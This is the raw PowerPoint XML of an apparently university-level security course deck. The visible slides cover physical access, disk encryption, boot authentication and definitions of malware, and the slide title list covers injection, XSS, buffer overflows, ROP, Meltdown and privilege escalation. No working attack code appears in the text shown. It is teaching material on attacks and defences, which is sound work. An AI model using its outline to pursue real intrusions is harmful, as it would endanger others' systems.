            <a:ext cx="2695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(1)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43BB4-2936-8198-801A-2616E4DA4EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443538" y="4559262"/>
            <a:ext cx="3898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(2) Bios, Bootloader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8A8791-D01F-0A4D-0991-7A096C456DBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6432751" y="3401974"/>
            <a:ext cx="200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(3) Kernel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229E-B1A0-0D26-D79B-65C0DCC4F862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5739425" y="1690688"/>
            <a:ext cx="31731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(4) User Mode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0"/>
              <a:t>   Apps, Services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AA05196-F66C-549E-C608-23941B7ECFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4491037" y="5982564"/>
            <a:ext cx="1152525" cy="2952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269837-21E9-576A-32EE-58F7BE6A7557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828647" y="5115698"/>
            <a:ext cx="34805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Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>physical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> PC,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Office </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Headquaters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>DataCenters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64638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73EF-B4E3-D105-7DC3-A00AE8138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38"/>
            <a:ext cx="10515600" cy="1199992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Example Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Vulnerabilities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C1A03-0383-E32A-7076-64640BAA9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6" y="1233329"/>
            <a:ext cx="5906731" cy="4029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9B42F-FA0D-E511-D089-4B8B61398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2186539"/>
            <a:ext cx="6123842" cy="447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79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B57D-DA66-782A-E04F-760D3F7A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Access to PC  Hard Disk </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>=&gt; can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  010010101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EF756-127D-8E76-CF01-D77C70EC1212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1659849" y="3119438"/>
            <a:ext cx="94205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Rule  # 1    = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1"/>
              <a:t>Encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1"/>
              <a:t>Disks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> key (in BIOS ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1"/>
              <a:t>secured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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11679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5E82F-ADFE-95FF-5EAF-491E7AB29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98"/>
            <a:ext cx="10515600" cy="1068878"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Boot - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Disk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D440C-89E1-BCC1-B107-897C01729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143"/>
            <a:ext cx="5937475" cy="3866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0641D2-8BE5-78FA-3D87-29284ADDC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6" y="1786083"/>
            <a:ext cx="5898812" cy="504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954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1EC5-599C-20D3-CB92-55C09E2F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Bios Pre-Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Authentication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5EE03-873D-03E3-19A4-ED5D1AF1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881" y="2544161"/>
            <a:ext cx="5505494" cy="2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016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D990-6894-97F4-F48D-E6E1F023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Un-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Disk?  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br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(do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to) Boot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9AFA9A-BA07-3912-2D0D-8B7B6D2C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433" y="4957763"/>
            <a:ext cx="7930074" cy="1733631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 2" descr="Boot menu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76F31178-4502-D47D-6FDA-D7F697532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" y="1690688"/>
            <a:ext cx="4643437" cy="183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F00BB4-68ED-4C13-8A80-BAD179432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063" y="3293591"/>
            <a:ext cx="6466691" cy="1449857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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0D5462FF-33FB-6B77-92E0-0D07E2016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658" y="1905003"/>
            <a:ext cx="20955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671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D8F6-0234-F112-17E6-16798DA9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Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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95EEF-06E3-2425-696C-32E16FCA16AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005013" y="2633663"/>
            <a:ext cx="95612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What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>side-effect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> can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done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> in few minutes on an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>unsecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> PC,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>    (no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>getting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> / change files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>ideas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="28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8893897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4510-66B0-640B-0D64-B0BB612C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Virus, Worm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9BA3E-1CB2-99AC-E690-8AA0920D1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60" y="2277258"/>
            <a:ext cx="10459356" cy="38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101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F0CA9-72A8-0B19-DCE3-4803AFF7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Virus Phases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1854C-4A44-CA5D-65C5-ABA5C2F4D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47" y="1027906"/>
            <a:ext cx="10421253" cy="56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108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52CDD-45B5-504C-DED4-CF135D8BC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"Virus"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7BCD1-17F8-7EA4-5328-38BB28252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2" y="2409825"/>
            <a:ext cx="11757017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011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A248E-DA8E-5168-E067-8AEBB472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Malware = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Software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FCF9-534D-E74C-04F0-32B2AF428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560" y="2038351"/>
            <a:ext cx="8174471" cy="383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324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1386-37BB-1747-F7AC-743072421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Trojan Horse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31B6E-2BEE-C74A-C59A-910BD4F72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571" y="2047876"/>
            <a:ext cx="8403249" cy="264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72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B552B16-06E8-4537-9A91-53B6F176ABA8}">
  <we:reference id="wa200005669" version="2.0.0.0" store="fr-FR" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="wa200005669" version="2.0.0.0" store="fr-FR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3030</TotalTime>
  <Words>3942</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>673</Paragraphs>
  <Slides>157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62" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Söhne Mono</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Theory and Practice of Security &amp; Privacy Part 4  Security of System, Vulnerabilities</vt:lpstr>
      <vt:lpstr>Security of Data  &amp; Security of Systems  What systems are we talking about ?</vt:lpstr>
      <vt:lpstr>Personal  /  On-Premise  /   Public Cloud (Private Cloud)</vt:lpstr>
      <vt:lpstr>Notice: Security of System  &lt;--&gt;  Security of Data</vt:lpstr>
      <vt:lpstr>Small Device Mono User - Mono Process need Security ? ( Isolation, Authentication, Confidentiality, etc.)</vt:lpstr>
      <vt:lpstr>Web Servers: Client - Https Servers  = Open to Internet</vt:lpstr>
      <vt:lpstr>Cyber Threats</vt:lpstr>
      <vt:lpstr>Security Vulnerabilities</vt:lpstr>
      <vt:lpstr>Example Types of Vulnerabilities</vt:lpstr>
      <vt:lpstr>Exploiting Vulnerabilities</vt:lpstr>
      <vt:lpstr>Example of Vulnerabilities</vt:lpstr>
      <vt:lpstr>Examples: Input Validation Errors</vt:lpstr>
      <vt:lpstr>SQL Injection [1/4] : Vulnerable Code</vt:lpstr>
      <vt:lpstr>SQL Injection [2/4] - Attack</vt:lpstr>
      <vt:lpstr>SQL Injection [3/4] : Remediation ( = Correction, Mitigation, Fix)</vt:lpstr>
      <vt:lpstr>SQL Injection [4/4] : ensure Bug is never written / compiled / deployed / ignored</vt:lpstr>
      <vt:lpstr>Common "Input Validation Errors"</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS, CSRF)  [1/4]</vt:lpstr>
      <vt:lpstr>XSS  [2/4] : Attack Payload</vt:lpstr>
      <vt:lpstr>XSS [3/4] : Remediation</vt:lpstr>
      <vt:lpstr>XSS[4/4]   can we detect/fix at Runtime ?</vt:lpstr>
      <vt:lpstr>Common "Input Validation Errors"</vt:lpstr>
      <vt:lpstr>Directory Path Traversal [1/3] : Vulnerable Code</vt:lpstr>
      <vt:lpstr>Directory Path Traversal [2/3] : Attack &amp; Impact</vt:lpstr>
      <vt:lpstr>Directory Path Traversal [3/3] : Remediations</vt:lpstr>
      <vt:lpstr>Common "Input Validation Errors"</vt:lpstr>
      <vt:lpstr>Remote Code Execution  (RCE)</vt:lpstr>
      <vt:lpstr>Looks Stupidly (deliberatly?) Unsafe  ... does it happen in real life ?</vt:lpstr>
      <vt:lpstr>Example of Scripting Helper : Jenkins CI/CD</vt:lpstr>
      <vt:lpstr>Jenkins CI/CD : Access controlled by the "Administer" permission</vt:lpstr>
      <vt:lpstr>Common "Input Validation Errors"</vt:lpstr>
      <vt:lpstr>XML External Entity (XXE) [1/3] : Vulnerability</vt:lpstr>
      <vt:lpstr>XML External Entity (XXE) [2/3] : Attack &amp; Risk</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common "Input Validation Errors"</vt:lpstr>
      <vt:lpstr>Insecure Deserialization = Unmarshaling Input - Code Execution</vt:lpstr>
      <vt:lpstr>log4j  CVE</vt:lpstr>
      <vt:lpstr>(Stack) Buffer Overflow ?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Anecdot on WII  - Nitendo Game Station</vt:lpstr>
      <vt:lpstr>Buffer Overflow : sample Vulnerability</vt:lpstr>
      <vt:lpstr>Buffer Overflow : Sample Attack &amp; Risk</vt:lpstr>
      <vt:lpstr>Decompiling Payload in Assembly</vt:lpstr>
      <vt:lpstr>decoded StackOverflow  Payload</vt:lpstr>
      <vt:lpstr>Explanation of  Stack / Return Address Code</vt:lpstr>
      <vt:lpstr>Why is it so common ??</vt:lpstr>
      <vt:lpstr>Better Langages?</vt:lpstr>
      <vt:lpstr>General Protections (by Compiler / Kernel / CPU)   for BufferOverflow</vt:lpstr>
      <vt:lpstr>Canary - Corrupted Detection Code</vt:lpstr>
      <vt:lpstr>Bound Checking</vt:lpstr>
      <vt:lpstr>Tagging : Executable Page  -  Read/Write Data Page </vt:lpstr>
      <vt:lpstr>Counter Measures to NX (No-Execute) Bit ... </vt:lpstr>
      <vt:lpstr>ROP  (Return-Oriented-Programming) assemblying "gadgets"  or "code chunks" into "chain"</vt:lpstr>
      <vt:lpstr>Counter - Counter Measures to ROP : ASLR  Address Space Layout Randomization</vt:lpstr>
      <vt:lpstr>ASLR</vt:lpstr>
      <vt:lpstr>Counter - Counter - Counter Measures to ASLR ?</vt:lpstr>
      <vt:lpstr>in Linux?</vt:lpstr>
      <vt:lpstr>SELinux ?</vt:lpstr>
      <vt:lpstr>Last but Not Least Vulnerabilities https://meltdownattack.com/</vt:lpstr>
      <vt:lpstr>All Modern CPUs were Impacted !!</vt:lpstr>
      <vt:lpstr>Vulnerability Impacts = Reading FULL Memory of all processes</vt:lpstr>
      <vt:lpstr>Video Demo</vt:lpstr>
      <vt:lpstr>Premature optimization is the root of all evil</vt:lpstr>
      <vt:lpstr>Cache Miss ?  &amp;   Page Protection Check ? Internal Instruction OpCode Reordering</vt:lpstr>
      <vt:lpstr>"Side-Channel"  Attack, on Response Time </vt:lpstr>
      <vt:lpstr>Intermediate Conclusion on System Security</vt:lpstr>
      <vt:lpstr>Adding Security Layers in the Network</vt:lpstr>
      <vt:lpstr>Server Exposed to Fire...  Put "FireWall" Protection</vt:lpstr>
      <vt:lpstr>Is That all ?</vt:lpstr>
      <vt:lpstr>Then Put An AntiVirus,   Is that all ?</vt:lpstr>
      <vt:lpstr>Typical Web App Server - Tiered Infrastructure</vt:lpstr>
      <vt:lpstr>Adding Protections Layers L1,L2,..L8</vt:lpstr>
      <vt:lpstr>DMZ = De-Militarized Zone</vt:lpstr>
      <vt:lpstr>HoneyPot</vt:lpstr>
      <vt:lpstr>Defense in Depth ?</vt:lpstr>
      <vt:lpstr>Bastion,  SSH Bastion, VPN</vt:lpstr>
      <vt:lpstr>Zero-Trust Architecture (ZTA) (Perimeterless)  ... even Insider Network is Unsafe</vt:lpstr>
      <vt:lpstr>Network Segmentation</vt:lpstr>
      <vt:lpstr>Example of Network Architecture:  "Hub - and - Spoke"</vt:lpstr>
      <vt:lpstr>Need for Isolations inside CPU / Kernel</vt:lpstr>
      <vt:lpstr>Multi Users - Multi Processes / Threads ... need "Isolation" Security</vt:lpstr>
      <vt:lpstr>Sharing (memory,cpu): Processes on  1 OS</vt:lpstr>
      <vt:lpstr>Single-Tenant   vs   Multi-Tenant ?</vt:lpstr>
      <vt:lpstr>Virtual Machine - Containers</vt:lpstr>
      <vt:lpstr>VM Monitor, Virtualizer,  Hypervisor</vt:lpstr>
      <vt:lpstr>Virtualized - Hyper Converged</vt:lpstr>
      <vt:lpstr>Physical Architecture of Computer</vt:lpstr>
      <vt:lpstr>https://en.wikipedia.org/wiki/Linux</vt:lpstr>
      <vt:lpstr>"Physical" Levels of Security 1, then 2, then 3 ..</vt:lpstr>
      <vt:lpstr>Access to PC  Hard Disk  =&gt; can read/write  010010101</vt:lpstr>
      <vt:lpstr>Boot - Encrypted Disk</vt:lpstr>
      <vt:lpstr>Bios Pre-Boot Authentication</vt:lpstr>
      <vt:lpstr>Un-Encrypted Disk?   can we (do you need to) Boot ?</vt:lpstr>
      <vt:lpstr>Write Malicious File</vt:lpstr>
      <vt:lpstr>Virus, Worm</vt:lpstr>
      <vt:lpstr>Virus Phases</vt:lpstr>
      <vt:lpstr>Not only "Virus"</vt:lpstr>
      <vt:lpstr>Malware = Malicious Software</vt:lpstr>
      <vt:lpstr>Trojan Horse</vt:lpstr>
      <vt:lpstr>KeyLogger</vt:lpstr>
      <vt:lpstr>be paranoiac ... KeyLogger are not only Software</vt:lpstr>
      <vt:lpstr>Physical Protections of DataCenters</vt:lpstr>
      <vt:lpstr>Challenge Securing Systems But Sharing  CPU-Memory Resources</vt:lpstr>
      <vt:lpstr>Securing Servers ... back to fundamentals</vt:lpstr>
      <vt:lpstr>CPU Resources - Cores Tasks (Process - Threads)</vt:lpstr>
      <vt:lpstr>Preemptive / Round-Robin Scheduling / Context Switches</vt:lpstr>
      <vt:lpstr>Running Programs =  Time Sharing CPU Cores "Kernel Threads" = using physical Cpu Core</vt:lpstr>
      <vt:lpstr>Process Task Structure</vt:lpstr>
      <vt:lpstr>Process Task Structure  [2/2]</vt:lpstr>
      <vt:lpstr>Process Task Structure -&gt; UserID</vt:lpstr>
      <vt:lpstr>process -&gt; user</vt:lpstr>
      <vt:lpstr>$ whoami   ,  $pwd</vt:lpstr>
      <vt:lpstr>$ cat /proc/${pid}/status     Uid: &lt;&lt;uid&gt;&gt;  &lt;&lt;gid&gt;&gt;</vt:lpstr>
      <vt:lpstr>/etc/password   ... list of Users,  uid (hashed password,  no more here  ":x:" )</vt:lpstr>
      <vt:lpstr>/etc/shadow   ... hashed passwords</vt:lpstr>
      <vt:lpstr>Security Notes on Process -&gt; UserID</vt:lpstr>
      <vt:lpstr>Rule #1  .. do not use  "root"  account   use minimalist service account priviledge use "sudo" exceptionnaly trace all "sudo" usages</vt:lpstr>
      <vt:lpstr>Rule #2   add separated service accounts                    for each app usage</vt:lpstr>
      <vt:lpstr>Example Rule #1, #2, #3  in  Android System : Install new App =&gt; Add new User</vt:lpstr>
      <vt:lpstr>Minimise Risk  Avoid Horyzontal Priviledge Escalations Avoid Pivoting</vt:lpstr>
      <vt:lpstr>Kernel</vt:lpstr>
      <vt:lpstr>Process Isolations Principles 1 Process = 1 Exe Program</vt:lpstr>
      <vt:lpstr>Process Isolations Principles</vt:lpstr>
      <vt:lpstr>Inside Process ... Full Sharing  (No Isolation)</vt:lpstr>
      <vt:lpstr>Notice in Chrome (then Edge/Firefox/...) 1 Navigation Tab  =  1 separate Process                                        (sandbox Js interpreter)</vt:lpstr>
      <vt:lpstr>Process Isolation, even for "Same User"</vt:lpstr>
      <vt:lpstr>Process -&gt; do System Calls  to execute "Kernel" code fragments </vt:lpstr>
      <vt:lpstr>Kernel Authorization Checks if (userId   has permission on ...) { ..}</vt:lpstr>
      <vt:lpstr>Process register to (or forced get) "Interuption" (Kernel can interupt Process to execute code)</vt:lpstr>
      <vt:lpstr>Kernel Objects "Handle" example: File Descriptor "0", "1", ...</vt:lpstr>
      <vt:lpstr>Example of Communication between Process read(fd , buffer)  -  write(fd, buffer)</vt:lpstr>
      <vt:lpstr>User Mode (Ring 3) / Kernel Mode  (Ring 0)</vt:lpstr>
      <vt:lpstr>Kernel Mode  !=   "Root" user process</vt:lpstr>
      <vt:lpstr>RootKit ?</vt:lpstr>
      <vt:lpstr>RootKit scandal - RootkitRevealer</vt:lpstr>
      <vt:lpstr>Priviledge Escalation</vt:lpstr>
      <vt:lpstr>Priviledge Escalations : { Vertical | Horyzontal }</vt:lpstr>
      <vt:lpstr>$ su      $ sudo su user1  -&gt;  account2 -&gt; root</vt:lpstr>
      <vt:lpstr>$ su root   ...   need root password  # su   anyuser ... do not need password</vt:lpstr>
      <vt:lpstr>$ sudo  &lt;&lt;command&gt;&gt;</vt:lpstr>
      <vt:lpstr>$ visudo     :  editing   /etc/sudoers</vt:lpstr>
      <vt:lpstr>Security Notes on Process -&gt; "filesystem" : chroot, containers</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>$ mount ,   FileSystem namespace,    Rootfs "/"</vt:lpstr>
      <vt:lpstr>$ chroot      Change Root Fs     root "/"  -&gt; jail</vt:lpstr>
      <vt:lpstr>Historically a way to "sandbox" a webserver</vt:lpstr>
      <vt:lpstr>chroot  [1/5]  (struggle with ChatGPT) chroot an app</vt:lpstr>
      <vt:lpstr>chroot  [2/5] Preparing the chrooted jail</vt:lpstr>
      <vt:lpstr>chroot [3/5]</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>chroot [5/5]</vt:lpstr>
      <vt:lpstr>Modern "chroot"  :  Containers                                               (lightweigth VMs)</vt:lpstr>
      <vt:lpstr>$ chmod  go-rwx</vt:lpstr>
      <vt:lpstr>setuid bit # chmod go+s</vt:lpstr>
      <vt:lpstr>setuid bit =&gt; anybody can "Run As" (root)</vt:lpstr>
      <vt:lpstr>NOTE ...  Sticky Bit  "t"   !=  "s" # chmod g+t</vt:lpstr>
      <vt:lpstr>Security is a Work In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&amp; Privacy Part 3</dc:title>
  <dc:creator>NAUWYNCK Arnaud</dc:creator>
  <cp:lastModifiedBy>NAUWYNCK Arnaud</cp:lastModifiedBy>
  <cp:revision>51</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-09T10:26:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-11T12:59:02Z</dcterms:modified>
</cp:coreProperties>
</file>